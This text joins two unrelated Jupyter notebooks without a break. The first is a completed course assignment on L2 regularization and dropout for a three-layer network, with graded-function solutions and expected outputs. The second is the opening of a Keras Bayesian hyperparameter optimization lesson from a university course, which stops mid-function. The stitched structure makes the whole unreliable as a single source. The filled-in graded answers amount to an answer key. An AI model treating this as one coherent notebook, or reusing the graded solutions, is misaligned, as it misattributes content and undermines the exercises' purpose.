**Your goal**: Use a deep learning model to find the positions on the field where the goalkeeper should kick the ball.
**Analysis of the dataset**: This dataset is a little noisy, but it looks like a diagonal line separating the upper left half (blue) from the lower right half (red) would work well.
You will first try a non-regularized model. Then you'll learn how to regularize it and decide which model you will choose to solve the French Football Corporation's problem.
## 1 - Non-regularized model
You will use the following neural network (already implemented for you below). This model can be used:
- in *regularization mode* -- by setting the `lambd` input to a non-zero value. We use "`lambd`" instead of "`lambda`" because "`lambda`" is a reserved keyword in Python.
- in *dropout mode* -- by setting the `keep_prob` to a value less than one
You will first try the model without any regularization. Then, you will implement:
- *L2 regularization* -- functions: "`compute_cost_with_regularization()`" and "`backward_propagation_with_regularization()`"
- *Dropout* -- functions: "`forward_propagation_with_dropout()`" and "`backward_propagation_with_dropout()`"
In each part, you will run this model with the correct inputs so that it calls the functions you've implemented. Take a look at the code below to familiarize yourself with the model.
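Before reading the model code, the "inverted dropout" idea behind `keep_prob` can be sketched in isolation (this is a standalone illustration, not the assignment's `forward_propagation_with_dropout`):

```python
import numpy as np

# Inverted dropout: zero out a fraction (1 - keep_prob) of activations and
# rescale the survivors by 1/keep_prob so the expected activation is unchanged.
rng = np.random.RandomState(1)
keep_prob = 0.8

A = np.ones((3, 10000))                 # toy activations
D = rng.rand(*A.shape) < keep_prob      # mask: True with probability keep_prob
A_drop = A * D / keep_prob              # drop and rescale

print(abs(A_drop.mean() - A.mean()) < 0.02)  # expectation is preserved
```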
```
def model(X, Y, learning_rate = 0.3, num_iterations = 30000, print_cost = True, lambd = 0, keep_prob = 1):
    """
    Implements a three-layer neural network: LINEAR->RELU->LINEAR->RELU->LINEAR->SIGMOID.
    Arguments:
    X -- input data, of shape (input size, number of examples)
    Y -- true "label" vector (1 for blue dot / 0 for red dot), of shape (output size, number of examples)
    learning_rate -- learning rate of the optimization
    num_iterations -- number of iterations of the optimization loop
    print_cost -- If True, print the cost every 10000 iterations
    lambd -- regularization hyperparameter, scalar
    keep_prob -- probability of keeping a neuron active during drop-out, scalar.
    Returns:
    parameters -- parameters learned by the model. They can then be used to predict.
    """
    grads = {}
    costs = []                            # to keep track of the cost
    m = X.shape[1]                        # number of examples
    layers_dims = [X.shape[0], 20, 3, 1]
    # Initialize parameters dictionary.
    parameters = initialize_parameters(layers_dims)
    # Loop (gradient descent)
    for i in range(0, num_iterations):
        # Forward propagation: LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID.
        if keep_prob == 1:
            a3, cache = forward_propagation(X, parameters)
        elif keep_prob < 1:
            a3, cache = forward_propagation_with_dropout(X, parameters, keep_prob)
        # Cost function
        if lambd == 0:
            cost = compute_cost(a3, Y)
        else:
            cost = compute_cost_with_regularization(a3, Y, parameters, lambd)
        # Backward propagation.
        assert(lambd==0 or keep_prob==1)  # it is possible to use both L2 regularization and dropout,
                                          # but this assignment will only explore one at a time
        if lambd == 0 and keep_prob == 1:
            grads = backward_propagation(X, Y, cache)
        elif lambd != 0:
            grads = backward_propagation_with_regularization(X, Y, cache, lambd)
        elif keep_prob < 1:
            grads = backward_propagation_with_dropout(X, Y, cache, keep_prob)
        # Update parameters.
        parameters = update_parameters(parameters, grads, learning_rate)
        # Print the loss every 10000 iterations
        if print_cost and i % 10000 == 0:
            print("Cost after iteration {}: {}".format(i, cost))
        if print_cost and i % 1000 == 0:
            costs.append(cost)
    # plot the cost
    plt.plot(costs)
    plt.ylabel('cost')
    plt.xlabel('iterations (x1,000)')
    plt.title("Learning rate =" + str(learning_rate))
    plt.show()
    return parameters
```
Let's train the model without any regularization, and observe the accuracy on the train/test sets.
```
parameters = model(train_X, train_Y)
print ("On the training set:")
predictions_train = predict(train_X, train_Y, parameters)
print ("On the test set:")
predictions_test = predict(test_X, test_Y, parameters)
```
The train accuracy is 94.8% while the test accuracy is 91.5%. This is the **baseline model** (you will observe the impact of regularization on this model). Run the following code to plot the decision boundary of your model.
```
plt.title("Model without regularization")
axes = plt.gca()
axes.set_xlim([-0.75,0.40])
axes.set_ylim([-0.75,0.65])
plot_decision_boundary(lambda x: predict_dec(parameters, x.T), train_X, train_Y)
```
The non-regularized model is obviously overfitting the training set. It is fitting the noisy points! Let's now look at two techniques to reduce overfitting.
## 2 - L2 Regularization
The standard way to avoid overfitting is called **L2 regularization**. It consists of appropriately modifying your cost function, from:
$$J = -\frac{1}{m} \sum\limits_{i = 1}^{m} \large{(}\small y^{(i)}\log\left(a^{[L](i)}\right) + (1-y^{(i)})\log\left(1- a^{[L](i)}\right) \large{)} \tag{1}$$
To:
$$J_{regularized} = \small \underbrace{-\frac{1}{m} \sum\limits_{i = 1}^{m} \large{(}\small y^{(i)}\log\left(a^{[L](i)}\right) + (1-y^{(i)})\log\left(1- a^{[L](i)}\right) \large{)} }_\text{cross-entropy cost} + \underbrace{\frac{1}{m} \frac{\lambda}{2} \sum\limits_l\sum\limits_k\sum\limits_j W_{k,j}^{[l]2} }_\text{L2 regularization cost} \tag{2}$$
Let's modify your cost and observe the consequences.
**Exercise**: Implement `compute_cost_with_regularization()` which computes the cost given by formula (2). To calculate $\sum\limits_k\sum\limits_j W_{k,j}^{[l]2}$ , use :
```python
np.sum(np.square(Wl))
```
Note that you have to do this for $W^{[1]}$, $W^{[2]}$ and $W^{[3]}$, then sum the three terms and multiply by $ \frac{1}{m} \frac{\lambda}{2} $.
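As a quick sanity check of that NumPy idiom (a standalone sketch; the matrix values are illustrative):

```python
import numpy as np

W = np.array([[1.0, -2.0],
              [3.0,  0.5]])
# Sum of squared entries: 1 + 4 + 9 + 0.25
print(np.sum(np.square(W)))  # 14.25
```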
```
# GRADED FUNCTION: compute_cost_with_regularization

def compute_cost_with_regularization(A3, Y, parameters, lambd):
    """
    Implement the cost function with L2 regularization. See formula (2) above.

    Arguments:
    A3 -- post-activation, output of forward propagation, of shape (output size, number of examples)
    Y -- "true" labels vector, of shape (output size, number of examples)
    parameters -- python dictionary containing parameters of the model
    lambd -- regularization hyperparameter, scalar

    Returns:
    cost -- value of the regularized loss function (formula (2))
    """
    m = Y.shape[1]
    W1 = parameters["W1"]
    W2 = parameters["W2"]
    W3 = parameters["W3"]

    cross_entropy_cost = compute_cost(A3, Y)  # This gives you the cross-entropy part of the cost

    ### START CODE HERE ### (approx. 1 line)
    L2_regularization_cost = (np.sum(np.square(W1)) + np.sum(np.square(W2)) + np.sum(np.square(W3))) * lambd / (2 * m)
    ### END CODE HERE ###

    cost = cross_entropy_cost + L2_regularization_cost

    return cost

A3, Y_assess, parameters = compute_cost_with_regularization_test_case()
print("cost = " + str(compute_cost_with_regularization(A3, Y_assess, parameters, lambd = 0.1)))
```
**Expected Output**:
<table>
<tr>
<td>
**cost**
</td>
<td>
1.78648594516
</td>
</tr>
</table>
Of course, because you changed the cost, you have to change backward propagation as well! All the gradients have to be computed with respect to this new cost.
**Exercise**: Implement the changes needed in backward propagation to take into account regularization. The changes only concern dW1, dW2 and dW3. For each, you have to add the regularization term's gradient ($\frac{d}{dW} ( \frac{1}{2}\frac{\lambda}{m} W^2) = \frac{\lambda}{m} W$).
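The regularization gradient above can be verified numerically with a centered finite difference (a standalone sketch; the values of `lambd`, `m`, and `W` are illustrative):

```python
lambd, m = 0.7, 5.0
W = 2.0

def reg_cost(w):
    # The per-weight L2 term from formula (2)
    return (lambd / (2 * m)) * w ** 2

eps = 1e-6
numeric = (reg_cost(W + eps) - reg_cost(W - eps)) / (2 * eps)
analytic = (lambd / m) * W  # the formula from the exercise

print(numeric, analytic)  # both ≈ 0.28
```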
```
# GRADED FUNCTION: backward_propagation_with_regularization

def backward_propagation_with_regularization(X, Y, cache, lambd):
    """
    Implements the backward propagation of our baseline model to which we added an L2 regularization.

    Arguments:
    X -- input dataset, of shape (input size, number of examples)
    Y -- "true" labels vector, of shape (output size, number of examples)
    cache -- cache output from forward_propagation()
    lambd -- regularization hyperparameter, scalar

    Returns:
    gradients -- A dictionary with the gradients with respect to each parameter, activation and pre-activation variables
    """
    m = X.shape[1]
    (Z1, A1, W1, b1, Z2, A2, W2, b2, Z3, A3, W3, b3) = cache

    dZ3 = A3 - Y
    ### START CODE HERE ### (approx. 1 line)
    dW3 = 1./m * np.dot(dZ3, A2.T) + lambd/m * W3
    ### END CODE HERE ###
    db3 = 1./m * np.sum(dZ3, axis=1, keepdims = True)

    dA2 = np.dot(W3.T, dZ3)
    dZ2 = np.multiply(dA2, np.int64(A2 > 0))
    ### START CODE HERE ### (approx. 1 line)
    dW2 = 1./m * np.dot(dZ2, A1.T) + lambd/m * W2
    ### END CODE HERE ###
    db2 = 1./m * np.sum(dZ2, axis=1, keepdims = True)

    dA1 = np.dot(W2.T, dZ2)
    dZ1 = np.multiply(dA1, np.int64(A1 > 0))
    ### START CODE HERE ### (approx. 1 line)
    dW1 = 1./m * np.dot(dZ1, X.T) + lambd/m * W1
    ### END CODE HERE ###
    db1 = 1./m * np.sum(dZ1, axis=1, keepdims = True)

    gradients = {"dZ3": dZ3, "dW3": dW3, "db3": db3, "dA2": dA2,
                 "dZ2": dZ2, "dW2": dW2, "db2": db2, "dA1": dA1,
                 "dZ1": dZ1, "dW1": dW1, "db1": db1}

    return gradients

X_assess, Y_assess, cache = backward_propagation_with_regularization_test_case()
grads = backward_propagation_with_regularization(X_assess, Y_assess, cache, lambd = 0.7)
print ("dW1 = \n"+ str(grads["dW1"]))
print ("dW2 = \n"+ str(grads["dW2"]))
print ("dW3 = \n"+ str(grads["dW3"]))
```
**Expected Output**:
```
dW1 =
[[-0.25604646 0.12298827 -0.28297129]
[-0.17706303 0.34536094 -0.4410571 ]]
dW2 =
[[ 0.79276486 0.85133918]
[-0.0957219 -0.01720463]
[-0.13100772 -0.03750433]]
dW3 =
[[-1.77691347 -0.11832879 -0.09397446]]
```
Let's now run the model with L2 regularization $(\lambda = 0.7)$. The `model()` function will call:
- `compute_cost_with_regularization` instead of `compute_cost`
- `backward_propagation_with_regularization` instead of `backward_propagation`
```
parameters = model(train_X, train_Y, lambd = 0.7)
print ("On the train set:")
predictions_train = predict(train_X, train_Y, parameters)
print ("On the test set:")
predictions_test = predict(test_X, test_Y, parameters)
```
Congrats, the test set accuracy increased to 93%. You have saved the French football team!
You are not overfitting the training data anymore. Let's plot the decision boundary.
```
plt.title("Model with L2-regularization")
axes = plt.gca()
axes.set_xlim([-0.75,0.40])
axes.set_ylim([-0.75,0.65])
plot_decision_boundary(lambda x: predict_dec(parameters, x.T), train_X, train_Y)
```
**Observations**:
- The value of $\lambda$ is a hyperparameter that you can tune using a dev set.
- L2 regularization makes your decision boundary smoother. If $\lambda$ is too large, it is also possible to "oversmooth", resulting in a model with high bias.
**What is L2-regularization actually doing?**:
L2-regularization relies on the assumption that a model with small weights is simpler than a model with large weights. Thus, by penalizing the square values of the weights in the cost function you drive all the weights to smaller values. It becomes too costly for the cost to have large weights! This leads to a smoother model in which the output changes more slowly as the input changes.
<font color='blue'>
**What you should remember** -- the implications of L2-regularization on:
- The cost computation:
- A regularization term is added to the cost
- The backpropagation function:
- There are extra terms in the gradients with respect to weight matrices
- Weights end up smaller ("weight decay"):
- Weights are pushed to smaller values.
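The "weight decay" effect can be seen directly in the update rule: isolating the regularization term, one gradient step multiplies every weight by the same factor slightly below one. A standalone numeric sketch (the hyperparameter values are illustrative):

```python
import numpy as np

lr, lambd, m = 0.3, 0.7, 200
W = np.array([[1.0, -2.0],
              [0.5,  3.0]])

dW_data = np.zeros_like(W)      # zero data gradient, to isolate the decay effect
dW = dW_data + (lambd / m) * W  # gradient of the L2 term
W_new = W - lr * dW

# Each weight shrank by the same factor 1 - lr * lambd / m = 0.99895
print(W_new / W)
```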
## 3 - Dropout
Finally, **dropout** is a widely used regularization technique that is specific to deep learning.
**It randomly shuts down some neurons in each iteration.** Watch these two videos to see what this means!
<!--
To understand drop-out, consider this conversation with a friend:
- Friend: "Why do you need all these neurons to train your network and classify images?".
- You: "Because each neuron contains a weight and can learn specific features/details/shapes of an image. The more neurons I have, the more features my model learns!"
- Friend: "I see, but are you sure that your neurons are learning different features and not all the same features?"
- You: "Good point... Neurons in the same layer actually don't talk to each other. It is definitely possible that they learn the same image features/shapes/forms/details... which would be redundant. There should be a solution."
-->
<center>
<video width="620" height="440" src="images/dropout1_kiank.mp4" type="video/mp4" controls>
</video>
</center>
<br>
<caption><center> <u> Figure 2 </u>: Drop-out on the second hidden layer. <br> At each iteration, you shut down (= set to zero) each neuron of a layer with probability $1 - keep\_prob$ or keep it with probability $keep\_prob$ (50% here). The dropped neurons don't contribute to the training in both the forward and backward propagations of the iteration. </center></caption>
<center>
<video width="620" height="440" src="images/dropout2_kiank.mp4" type="video/mp4" controls>
</video>
</center>
<caption><center> <u> Figure 3 </u>: Drop-out on the first and third hidden layers. <br> $1^{st}$ layer: we shut down on average 40% of the neurons. $3^{rd}$ layer: we shut down on average 20% of the neurons. </center></caption>
When you shut some neurons down, you actually modify your model. The idea behind drop-out is that at each iteration, you train a different model that uses only a subset of your neurons. With dropout, your neurons thus become less sensitive to the activation of one other specific neuron, because that other neuron might be shut down at any time.
### 3.1 - Forward propagation with dropout
**Exercise**: Implement the forward propagation with dropout. You are using a 3 layer neural network, and will add dropout to the first and second hidden layers. We will not apply dropout to the input layer or output layer.
**Instructions**:
You would like to shut down some neurons in the first and second layers. To do that, you are going to carry out 4 Steps:
1. In lecture, we discussed creating a variable $d^{[1]}$ with the same shape as $a^{[1]}$ using `np.random.rand()` to randomly get numbers between 0 and 1. Here, you will use a vectorized implementation, so create a random matrix $D^{[1]} = [d^{[1](1)} d^{[1](2)} ... d^{[1](m)}] $ of the same dimension as $A^{[1]}$.
2. Set each entry of $D^{[1]}$ to be 1 with probability (`keep_prob`), and 0 otherwise.
**Hint:** Let's say that keep_prob = 0.8, which means that we want to keep about 80% of the neurons and drop out about 20% of them. We want to generate a vector that has 1's and 0's, where about 80% of them are 1 and about 20% are 0.
This python statement:
`X = (X < keep_prob).astype(int)`
is conceptually the same as this if-else statement (for the simple case of a one-dimensional array) :
```
for i, v in enumerate(x):
    if v < keep_prob:
        x[i] = 1
    else:  # v >= keep_prob
        x[i] = 0
```
Note that `X = (X < keep_prob).astype(int)` also works with multi-dimensional arrays, and the resulting output preserves the dimensions of the input array.
Also note that without using `.astype(int)`, the result is an array of booleans `True` and `False`, which Python automatically converts to 1 and 0 if we multiply it with numbers. (However, it's better practice to convert data into the data type that we intend, so try using `.astype(int)`.)
3. Set $A^{[1]}$ to $A^{[1]} * D^{[1]}$. (You are shutting down some neurons). You can think of $D^{[1]}$ as a mask, so that when it is multiplied with another matrix, it shuts down some of the values.
4. Divide $A^{[1]}$ by `keep_prob`. By doing this you are assuring that the result of the cost will still have the same expected value as without drop-out. (This technique is also called inverted dropout.)
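Steps 1 and 2 can be checked in isolation: with a large enough mask, the fraction of ones is close to `keep_prob` (a standalone sketch; the mask shape is illustrative):

```python
import numpy as np

np.random.seed(1)
keep_prob = 0.8
D1 = np.random.rand(3, 1000)       # Step 1: uniform random values in [0, 1)
D1 = (D1 < keep_prob).astype(int)  # Step 2: 1 with probability keep_prob, else 0
print(D1.mean())                   # ≈ 0.8 — about 80% of entries are kept
```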
```
# GRADED FUNCTION: forward_propagation_with_dropout

def forward_propagation_with_dropout(X, parameters, keep_prob = 0.5):
    """
    Implements the forward propagation: LINEAR -> RELU + DROPOUT -> LINEAR -> RELU + DROPOUT -> LINEAR -> SIGMOID.

    Arguments:
    X -- input dataset, of shape (2, number of examples)
    parameters -- python dictionary containing your parameters "W1", "b1", "W2", "b2", "W3", "b3":
                    W1 -- weight matrix of shape (20, 2)
                    b1 -- bias vector of shape (20, 1)
                    W2 -- weight matrix of shape (3, 20)
                    b2 -- bias vector of shape (3, 1)
                    W3 -- weight matrix of shape (1, 3)
                    b3 -- bias vector of shape (1, 1)
    keep_prob -- probability of keeping a neuron active during drop-out, scalar

    Returns:
    A3 -- last activation value, output of the forward propagation, of shape (1, number of examples)
    cache -- tuple, information stored for computing the backward propagation
    """
    np.random.seed(1)

    # retrieve parameters
    W1 = parameters["W1"]
    b1 = parameters["b1"]
    W2 = parameters["W2"]
    b2 = parameters["b2"]
    W3 = parameters["W3"]
    b3 = parameters["b3"]

    # LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID
    Z1 = np.dot(W1, X) + b1
    A1 = relu(Z1)
    ### START CODE HERE ### (approx. 4 lines)     # Steps 1-4 below correspond to the Steps 1-4 described above.
    D1 = np.random.rand(A1.shape[0], A1.shape[1]) # Step 1: initialize matrix D1 = np.random.rand(..., ...)
    D1 = (D1 < keep_prob).astype(int)             # Step 2: convert entries of D1 to 0 or 1 (using keep_prob as the threshold)
    A1 = A1 * D1                                  # Step 3: shut down some neurons of A1
    A1 = A1 / keep_prob                           # Step 4: scale the value of neurons that haven't been shut down
    ### END CODE HERE ###
    Z2 = np.dot(W2, A1) + b2
    A2 = relu(Z2)
    ### START CODE HERE ### (approx. 4 lines)
    D2 = np.random.rand(A2.shape[0], A2.shape[1]) # Step 1: initialize matrix D2 = np.random.rand(..., ...)
    D2 = (D2 < keep_prob).astype(int)             # Step 2: convert entries of D2 to 0 or 1 (using keep_prob as the threshold)
    A2 = A2 * D2                                  # Step 3: shut down some neurons of A2
    A2 = A2 / keep_prob                           # Step 4: scale the value of neurons that haven't been shut down
    ### END CODE HERE ###
    Z3 = np.dot(W3, A2) + b3
    A3 = sigmoid(Z3)

    cache = (Z1, D1, A1, W1, b1, Z2, D2, A2, W2, b2, Z3, A3, W3, b3)

    return A3, cache

X_assess, parameters = forward_propagation_with_dropout_test_case()
A3, cache = forward_propagation_with_dropout(X_assess, parameters, keep_prob = 0.7)
print ("A3 = " + str(A3))
```
**Expected Output**:
<table>
<tr>
<td>
**A3**
</td>
<td>
[[ 0.36974721 0.00305176 0.04565099 0.49683389 0.36974721]]
</td>
</tr>
</table>
### 3.2 - Backward propagation with dropout
**Exercise**: Implement the backward propagation with dropout. As before, you are training a 3 layer network. Add dropout to the first and second hidden layers, using the masks $D^{[1]}$ and $D^{[2]}$ stored in the cache.
**Instructions**:
Backpropagation with dropout is actually quite easy. You will have to carry out 2 Steps:
1. You had previously shut down some neurons during forward propagation, by applying a mask $D^{[1]}$ to `A1`. In backpropagation, you will have to shut down the same neurons, by reapplying the same mask $D^{[1]}$ to `dA1`.
2. During forward propagation, you had divided `A1` by `keep_prob`. In backpropagation, you'll therefore have to divide `dA1` by `keep_prob` again (the calculus interpretation is that if $A^{[1]}$ is scaled by `keep_prob`, then its derivative $dA^{[1]}$ is also scaled by the same `keep_prob`).
```
# GRADED FUNCTION: backward_propagation_with_dropout

def backward_propagation_with_dropout(X, Y, cache, keep_prob):
    """
    Implements the backward propagation of our baseline model to which we added dropout.

    Arguments:
    X -- input dataset, of shape (2, number of examples)
    Y -- "true" labels vector, of shape (output size, number of examples)
    cache -- cache output from forward_propagation_with_dropout()
    keep_prob -- probability of keeping a neuron active during drop-out, scalar

    Returns:
    gradients -- A dictionary with the gradients with respect to each parameter, activation and pre-activation variables
    """
    m = X.shape[1]
    (Z1, D1, A1, W1, b1, Z2, D2, A2, W2, b2, Z3, A3, W3, b3) = cache

    dZ3 = A3 - Y
    dW3 = 1./m * np.dot(dZ3, A2.T)
    db3 = 1./m * np.sum(dZ3, axis=1, keepdims = True)
    dA2 = np.dot(W3.T, dZ3)
    ### START CODE HERE ### (≈ 2 lines of code)
    dA2 = dA2 * D2         # Step 1: Apply mask D2 to shut down the same neurons as during the forward propagation
    dA2 = dA2 / keep_prob  # Step 2: Scale the value of neurons that haven't been shut down
    ### END CODE HERE ###
    dZ2 = np.multiply(dA2, np.int64(A2 > 0))
    dW2 = 1./m * np.dot(dZ2, A1.T)
    db2 = 1./m * np.sum(dZ2, axis=1, keepdims = True)

    dA1 = np.dot(W2.T, dZ2)
    ### START CODE HERE ### (≈ 2 lines of code)
    dA1 = dA1 * D1         # Step 1: Apply mask D1 to shut down the same neurons as during the forward propagation
    dA1 = dA1 / keep_prob  # Step 2: Scale the value of neurons that haven't been shut down
    ### END CODE HERE ###
    dZ1 = np.multiply(dA1, np.int64(A1 > 0))
    dW1 = 1./m * np.dot(dZ1, X.T)
    db1 = 1./m * np.sum(dZ1, axis=1, keepdims = True)

    gradients = {"dZ3": dZ3, "dW3": dW3, "db3": db3, "dA2": dA2,
                 "dZ2": dZ2, "dW2": dW2, "db2": db2, "dA1": dA1,
                 "dZ1": dZ1, "dW1": dW1, "db1": db1}

    return gradients

X_assess, Y_assess, cache = backward_propagation_with_dropout_test_case()
gradients = backward_propagation_with_dropout(X_assess, Y_assess, cache, keep_prob = 0.8)
print ("dA1 = \n" + str(gradients["dA1"]))
print ("dA2 = \n" + str(gradients["dA2"]))
```
**Expected Output**:
```
dA1 =
[[ 0.36544439 0. -0.00188233 0. -0.17408748]
[ 0.65515713 0. -0.00337459 0. -0. ]]
dA2 =
[[ 0.58180856 0. -0.00299679 0. -0.27715731]
[ 0. 0.53159854 -0. 0.53159854 -0.34089673]
[ 0. 0. -0.00292733 0. -0. ]]
```
Let's now run the model with dropout (`keep_prob = 0.86`). This means that at every iteration you shut down each neuron of layers 1 and 2 with probability 14%. The function `model()` will now call:
- `forward_propagation_with_dropout` instead of `forward_propagation`.
- `backward_propagation_with_dropout` instead of `backward_propagation`.
```
parameters = model(train_X, train_Y, keep_prob = 0.86, learning_rate = 0.3)
print ("On the train set:")
predictions_train = predict(train_X, train_Y, parameters)
print ("On the test set:")
predictions_test = predict(test_X, test_Y, parameters)
```
Dropout works great! The test accuracy has increased again (to 95%)! Your model is not overfitting the training set and does a great job on the test set. The French football team will be forever grateful to you!
Run the code below to plot the decision boundary.
```
plt.title("Model with dropout")
axes = plt.gca()
axes.set_xlim([-0.75,0.40])
axes.set_ylim([-0.75,0.65])
plot_decision_boundary(lambda x: predict_dec(parameters, x.T), train_X, train_Y)
```
**Note**:
- A **common mistake** when using dropout is to use it both in training and testing. You should use dropout (randomly eliminate nodes) only in training.
- Deep learning frameworks like [tensorflow](https://www.tensorflow.org/api_docs/python/tf/nn/dropout), [PaddlePaddle](http://doc.paddlepaddle.org/release_doc/0.9.0/doc/ui/api/trainer_config_helpers/attrs.html), [keras](https://keras.io/layers/core/#dropout) or [caffe](http://caffe.berkeleyvision.org/tutorial/layers/dropout.html) come with a dropout layer implementation. Don't stress - you will soon learn some of these frameworks.
<font color='blue'>
**What you should remember about dropout:**
- Dropout is a regularization technique.
- You only use dropout during training. Don't use dropout (randomly eliminate nodes) during test time.
- Apply dropout both during forward and backward propagation.
- During training time, divide each dropout layer by keep_prob to keep the same expected value for the activations. For example, if keep_prob is 0.5, then we will on average shut down half the nodes, so the output will be scaled by 0.5 since only the remaining half are contributing to the solution. Dividing by 0.5 is equivalent to multiplying by 2. Hence, the output now has the same expected value. You can check that this works even when keep_prob is other values than 0.5.
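That expected-value argument can be checked numerically: masking alone scales the mean activation by `keep_prob`, and the division restores it (a standalone sketch with synthetic activations):

```python
import numpy as np

np.random.seed(0)
keep_prob = 0.5
A = np.random.rand(50, 10000) + 1.0         # synthetic activations, mean ≈ 1.5
D = (np.random.rand(*A.shape) < keep_prob)  # keep each unit with probability 0.5

print(A.mean())                    # ≈ 1.5
print((A * D).mean())              # ≈ 0.75 — masking halves the expected value
print((A * D / keep_prob).mean())  # ≈ 1.5 — inverted dropout restores it
```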
## 4 - Conclusions
**Here are the results of our three models**:
<table>
<tr>
<td>
**model**
</td>
<td>
**train accuracy**
</td>
<td>
**test accuracy**
</td>
</tr>
<tr>
<td>
3-layer NN without regularization
</td>
<td>
95%
</td>
<td>
91.5%
</td>
</tr>
<tr>
<td>
3-layer NN with L2-regularization
</td>
<td>
94%
</td>
<td>
93%
</td>
</tr>
<tr>
<td>
3-layer NN with dropout
</td>
<td>
93%
</td>
<td>
95%
</td>
</tr>
</table>
Note that regularization hurts training set performance! This is because it limits the ability of the network to overfit to the training set. But since it ultimately gives better test accuracy, it is helping your system.
Congratulations for finishing this assignment! And also for revolutionizing French football. :-)
<font color='blue'>
**What we want you to remember from this notebook**:
- Regularization will help you reduce overfitting.
- Regularization will drive your weights to lower values.
- L2 regularization and Dropout are two very effective regularization techniques.
<a href="https://colab.research.google.com/github/jeffheaton/t81_558_deep_learning/blob/master/t81_558_class_08_4_bayesian_hyperparameter_opt.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# T81-558: Applications of Deep Neural Networks
**Module 8: Kaggle Data Sets**
* Instructor: [Jeff Heaton](https://sites.wustl.edu/jeffheaton/), McKelvey School of Engineering, [Washington University in St. Louis](https://engineering.wustl.edu/Programs/Pages/default.aspx)
* For more information visit the [class website](https://sites.wustl.edu/jeffheaton/t81-558/).
# Module 8 Material
* Part 8.1: Introduction to Kaggle [[Video]](https://www.youtube.com/watch?v=v4lJBhdCuCU&list=PLjy4p-07OYzulelvJ5KVaT2pDlxivl_BN) [[Notebook]](t81_558_class_08_1_kaggle_intro.ipynb)
* Part 8.2: Building Ensembles with Scikit-Learn and Keras [[Video]](https://www.youtube.com/watch?v=LQ-9ZRBLasw&list=PLjy4p-07OYzulelvJ5KVaT2pDlxivl_BN) [[Notebook]](t81_558_class_08_2_keras_ensembles.ipynb)
* Part 8.3: How Should you Architect Your Keras Neural Network: Hyperparameters [[Video]](https://www.youtube.com/watch?v=1q9klwSoUQw&list=PLjy4p-07OYzulelvJ5KVaT2pDlxivl_BN) [[Notebook]](t81_558_class_08_3_keras_hyperparameters.ipynb)
* **Part 8.4: Bayesian Hyperparameter Optimization for Keras** [[Video]](https://www.youtube.com/watch?v=sXdxyUCCm8s&list=PLjy4p-07OYzulelvJ5KVaT2pDlxivl_BN) [[Notebook]](t81_558_class_08_4_bayesian_hyperparameter_opt.ipynb)
* Part 8.5: Current Semester's Kaggle [[Video]](https://www.youtube.com/watch?v=48OrNYYey5E) [[Notebook]](t81_558_class_08_5_kaggle_project.ipynb)
# Google CoLab Instructions
The following code ensures that Google CoLab is running the correct version of TensorFlow.
```
# Startup Google CoLab
try:
    %tensorflow_version 2.x
    COLAB = True
    print("Note: using Google CoLab")
except:
    print("Note: not using Google CoLab")
    COLAB = False

# Nicely formatted time string
def hms_string(sec_elapsed):
    h = int(sec_elapsed / (60 * 60))
    m = int((sec_elapsed % (60 * 60)) / 60)
    s = sec_elapsed % 60
    return "{}:{:>02}:{:>05.2f}".format(h, m, s)
```
# Part 8.4: Bayesian Hyperparameter Optimization for Keras
Snoek, J., Larochelle, H., & Adams, R. P. (2012). [Practical bayesian optimization of machine learning algorithms](https://arxiv.org/pdf/1206.2944.pdf). In *Advances in neural information processing systems* (pp. 2951-2959).
* [bayesian-optimization](https://github.com/fmfn/BayesianOptimization)
* [hyperopt](https://github.com/hyperopt/hyperopt)
* [spearmint](https://github.com/JasperSnoek/spearmint)
```
# Ignore useless W0819 warnings generated by TensorFlow 2.0. Hopefully can remove this ignore in the future.
# See https://github.com/tensorflow/tensorflow/issues/31308
import logging, os
logging.disable(logging.WARNING)
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"
import pandas as pd
from scipy.stats import zscore
# Read the data set
df = pd.read_csv(
"https://data.heatonresearch.com/data/t81-558/jh-simple-dataset.csv",
na_values=['NA','?'])
# Generate dummies for job
df = pd.concat([df,pd.get_dummies(df['job'],prefix="job")],axis=1)
df.drop('job', axis=1, inplace=True)
# Generate dummies for area
df = pd.concat([df,pd.get_dummies(df['area'],prefix="area")],axis=1)
df.drop('area', axis=1, inplace=True)
# Missing values for income
med = df['income'].median()
df['income'] = df['income'].fillna(med)
# Standardize ranges
df['income'] = zscore(df['income'])
df['aspect'] = zscore(df['aspect'])
df['save_rate'] = zscore(df['save_rate'])
df['age'] = zscore(df['age'])
df['subscriptions'] = zscore(df['subscriptions'])
# Convert to numpy - Classification
x_columns = df.columns.drop('product').drop('id')
x = df[x_columns].values
dummies = pd.get_dummies(df['product']) # Classification
products = dummies.columns
y = dummies.values
import pandas as pd
import os
import numpy as np
import time
import tensorflow.keras.initializers
import statistics
import tensorflow.keras
from sklearn import metrics
from sklearn.model_selection import StratifiedKFold
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Activation, Dropout, InputLayer
from tensorflow.keras import regularizers
from tensorflow.keras.callbacks import EarlyStopping
from sklearn.model_selection import StratifiedShuffleSplit
from tensorflow.keras.layers import LeakyReLU,PReLU
from tensorflow.keras.optimizers import Adam
def generate_model(dropout, neuronPct, neuronShrink):
    # We start with some percent of 5000 starting neurons on the first hidden layer.
    neuronCount = int(neuronPct * 5000)

    # Construct neural network
    # kernel_initializer = tensorflow.keras.initializers.he_uniform(seed=None)
    model = Sequential()

    # So long as there would have been at least 25 neurons and fewer than 10
    # layers, create a new layer.
    layer = 0
    while neuronCount > 25 and layer < 10:
        # The first (0th) layer needs an input_dim; later layers infer their input size.
        if layer == 0:
            model.add(Dense(neuronCount,
                            input_dim=x.shape[1],
                            activation=PReLU()))
        else:
            model.add(Dense(neuronCount, activation=PReLU()))
        layer += 1

        # Add dropout after each hidden layer
        model.add(Dropout(dropout))

        # Shrink neuron count for each layer
        neuronCount = neuronCount * neuronShrink

    model.add(Dense(y.shape[1], activation='softmax'))  # Output
    return model

# Generate a model and see what the resulting structure looks like.
model = generate_model(dropout=0.2, neuronPct=0.1, neuronShrink=0.25)
model.summary()
def evaluate_network(dropout, lr, neuronPct, neuronShrink):
    SPLITS = 2

    # Bootstrap
    boot = StratifiedShuffleSplit(n_splits=SPLITS, test_size=0.1)

    # Track progress
    mean_benchmark = []
    epochs_needed = []
    num = 0

    # Loop through samples
    for train, test in boot.split(x, df['product']):
        start_time = time.time()
        num += 1

        # Split train and test
        x_train = x[train]
        y_train = y[train]
        x_test = x[test]
